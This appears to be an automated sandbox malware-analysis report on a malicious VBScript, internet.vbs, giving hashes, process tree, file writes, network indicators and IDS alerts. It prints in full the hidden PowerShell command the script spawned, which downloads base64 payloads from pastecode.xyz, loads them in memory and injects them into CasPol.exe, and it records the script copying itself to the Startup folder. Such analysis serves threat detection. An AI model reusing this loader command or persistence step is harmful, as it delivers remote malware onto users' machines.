File name: | internet.vbs |
Full analysis: | https://app.any.run/tasks/5bb45138-8885-44d2-991a-44519062f4a8 |
Verdict: | Malicious activity |
Analysis date: | August 13, 2019, 16:59:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 6C88274561D52EDFE9F175BD92B76692 |
SHA1: | 0EFC4DD0AABFF4EA11988FFBA2B5D90744417134 |
SHA256: | E6A07484A9765C7474B4E5EFB80638C43A9935B23EDA3204A625B82F7FF4D9F2 |
SSDEEP: | 768:GPncYM2V7mtX+rucq3+kSux/6IjYf2H4LShXu:vYM2V7mtX+rucqOkSux/6IjYOH4LShe |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
352 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\internet.vbs" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1212 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -noLogo -Noninteractive -noProfile -executionPolicy bypass -windowstyle hidden $version = @([System.Reflection.Assembly]::GetExecutingAssembly().ImageRuntimeVersion); function HexToBin([string]$ZCsHUkqNsajVXB6) { $return = @() for ($i = 0; $i -lt $ZCsHUkqNsajVXB6.Length ; $i += 2) { $return += [Byte]::Parse($ZCsHUkqNsajVXB6.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber) } Write-Output $return } $webClient = New-Object System.Net.WebClient $ZCsHUkqNsajVXB6tr = $webClient.DownloadString('https://pastecode.xyz/view/raw/07493a29 '); $Assembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($ZCsHUkqNsajVXB6tr)) $webClient = New-Object System.Net.WebClient $ZCsHUkqNsajVXB6tr = $webClient.DownloadString('https://pastecode.xyz/view/raw/a69f90d9 '); [byte[]]$Data = [Convert]::FromBase64String($ZCsHUkqNsajVXB6tr); $t = $Assembly.GetType('C.M') $m = $t.GetMethod('R') $m.Invoke($null, ($null, $('\Windows\Microsoft.NET\Framework\' + $version + '\CasPol.exe'), '', $Data, $True)) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1212 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AWW0DGHJOQOA1ZQQRTKU.temp | — | |
MD5:— | SHA256:— | |||
1212 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
1212 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF370beb.TMP | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
352 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\internet.vbs | text | |
MD5:6C88274561D52EDFE9F175BD92B76692 | SHA256:E6A07484A9765C7474B4E5EFB80638C43A9935B23EDA3204A625B82F7FF4D9F2 | |||
352 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastecode[1].txt | text | |
MD5:0FF8711B6279F264019045CFFDB2251F | SHA256:BD6DAD5441A49DEB5759D7D903EEBD023FF79B50A4E1AC9CD38BC03D0B5CDBB0 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1212 | powershell.exe | 158.69.240.84:443 | pastecode.xyz | OVH SAS | CA | malicious |
352 | WScript.exe | 158.69.240.84:443 | pastecode.xyz | OVH SAS | CA | malicious |
Domain | IP | Reputation |
---|---|---|
pastecode.xyz |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
352 | WScript.exe | Potentially Bad Traffic | ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz) |
1212 | powershell.exe | Potentially Bad Traffic | ET INFO Observed Let's Encrypt Certificate for Suspicious TLD (.xyz) |